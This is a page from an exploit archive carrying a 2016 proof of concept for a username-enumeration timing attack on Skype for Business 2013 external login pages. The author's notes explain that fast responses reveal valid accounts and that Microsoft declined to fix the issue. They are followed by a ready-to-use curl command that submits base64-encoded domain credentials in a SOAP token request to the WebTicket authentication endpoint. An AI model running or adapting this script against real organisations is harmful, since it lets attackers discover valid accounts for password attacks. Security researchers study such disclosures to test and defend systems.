what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Skype For Business 2013 User Enumeration

Skype For Business 2013 User Enumeration
Posted Jun 17, 2016
Authored by nyxgeek

Skype for Business 2013 suffers from a user enumeration timing attack vulnerability.

tags | exploit
SHA-256 | dedc70fffc5ea2d07f68d69fbe8ae570b34e97daacc51b72c8224705bb509cbc

Skype For Business 2013 User Enumeration

Change Mirror Download
# Exploit Title: Skype for Business 2013 user enumeration timing attack
# Date: 2016-06-08
# Exploit Author: nyxgeek
# Vendor Homepage: https://www.microsoft.com
# Version: Skype for Business 2013
#
#
# Skype for Business 2013 is vulnerable to a timing attack that allows for username enumeration
#
# When Skype/Lync is exposed externally, a login page will be located at https://dialin.domain.com.
#
# In the attack, a short response time indicates a valid username, whereas a long response time
# indicates an invalid username. This was tested in a large AD environment with many OUs and
# thousands of accounts.
#
# It is possible that the difference in response times may be smaller in smaller AD environments
#
# For example:
# Valid username response time - 0.49s
# Invalid username response time - 3.54s
#
#
# Usernames and passwords are both base64-encoded without a newline, and submitted in the form
# of DOMAIN\username.
#
# When generating the base64 on linux use the -n parameter with echo to exclude the newline char
# echo -n "DOMAIN\username" | base64
#
# This was reported to Microsoft on 2016-06-07 but it 'does not meet the bar for security servicing'
#
# Below is a proof of concept curl command, which can be thrown into a bash script for ease of use.

#!/bin/bash

curl -o /dev/null -w "\n\nTOTAL TIME IS %{time_total}\n\n" -i -s -k -X 'POST' \
-H 'User-Agent: Just looking around' \
-H 'Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7' \
-H 'Keep-Alive: 300' -H 'Content-Type: text/xml' \
-H 'SOAPAction: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue' \
-H 'Referer: https://dialin.domain.com/Dialin/Conference.aspx' \
--data-binary $'<s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\"><s:Header><Security s:mustUnderstand=\"1\" xmlns:u=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\" xmlns=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd\"><UsernameToken><Username>RE9NQUlOXHVzZXJuYW1l</Username><Password Type=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText\">c2VjcmV0cGFzc3dvcmQ=</Password></UsernameToken></Security></s:Header><s:Body><RequestSecurityToken xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" Context=\"ec86f904-154f-0597-3dee-59eb1b51e731\" xmlns=\"http://docs.oasis-open.org/ws-sx/ws-trust/200512\"><TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType><RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</RequestType><AppliesTo xmlns=\"http://schemas.xmlsoap.org/ws/2004/09/policy\"><EndpointReference xmlns=\"http://www.w3.org/2005/08/addressing\"><Address>https://dialin.domain.com/WebTicket/WebTicketService.svc/Auth</Address></EndpointReference></AppliesTo><Lifetime><Created xmlns=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\">2016-06-07T02:23:36Z</Created><Expires xmlns=\"http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd\">2016-06-07T02:38:36Z</Expires></Lifetime><KeyType>http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey</KeyType></RequestSecurityToken></s:Body></s:Envelope>' \
'https://dialin.domain.com/WebTicket/WebTicketService.svc/Auth'

Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close